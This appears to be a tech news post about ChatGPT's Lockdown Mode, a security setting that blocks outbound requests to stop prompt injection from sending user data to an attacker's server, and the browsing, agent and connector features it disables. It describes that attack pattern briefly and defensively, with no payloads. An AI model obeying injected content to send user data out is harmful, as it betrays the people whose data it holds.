OpenAI just rolled out Lockdown Mode for ChatGPT, a new security setting designed to shut down one of the most dangerous attack vectors in AI: prompt injection-based data exfiltration. It’s available now for all personal accounts — Free through Pro — and self-serve Business plans.
What Lockdown Mode Actually Blocks
The feature targets the final stage of a prompt injection attack, where an attacker tricks ChatGPT into sending sensitive data to an external server. Lockdown Mode combines sandboxing, URL-based exfiltration protections, monitoring, and enforcement at the model, product, and system levels. It doesn’t prevent prompt injections from happening — malicious content can still influence the model’s responses — but it cuts off the outbound network requests that would carry your data to an attacker.
That’s a meaningful distinction. The injection itself might still work, but the stolen data hits a wall before it leaves OpenAI’s environment.
The Tradeoffs Are Real
Enabling Lockdown Mode comes with significant capability restrictions. Web browsing is limited to cached content, so search results may be outdated or unavailable. Deep Research and Agent Mode are completely disabled. ChatGPT can’t download files for data analysis — only manually uploaded files work. Canvas-generated code that requires network access can’t be approved.
For connectors and third-party apps, live access and write actions are blocked on personal accounts. Features like Finances in ChatGPT and shopping-agent experiences become unavailable. In managed workspaces, admins control app and connector access through role-based permissions, and OpenAI recommends reviewing each app’s exfiltration risk before enabling it for Lockdown Mode users.
Who Is This For?
OpenAI is clear that this isn’t meant for everyone. It’s built for people and organizations handling sensitive data — think legal teams, healthcare workers, financial analysts, or anyone pasting proprietary information into ChatGPT regularly. If you’re using ChatGPT for casual browsing and creative writing, the restrictions probably aren’t worth it.
But for security-conscious teams already using ChatGPT Business, this is a genuine step forward. The Compliance API Logs Platform provides visibility into app usage and shared data, giving admins the audit trail they need.
The Bigger Picture
Prompt injection has been the Achilles’ heel of AI assistants since day one. Every connector, every web browsing capability, every file download feature is a potential exfiltration path. OpenAI’s approach here is pragmatic: instead of claiming to prevent injection, they’re focusing on blocking the data from leaving. That’s honest, and it’s effective.
The real question is whether competitors like Google and Anthropic will follow suit with similar features. As AI agents become more deeply integrated into enterprise workflows, “lockdown” capabilities will stop being optional extras and start being baseline requirements.
What to Do
If you handle sensitive data in ChatGPT, enable Lockdown Mode and test your workflows before committing to it. Workspace admins should audit connector permissions and review which apps team members actually need. And keep an eye on OpenAI’s documentation — they’re clearly iterating fast on this.
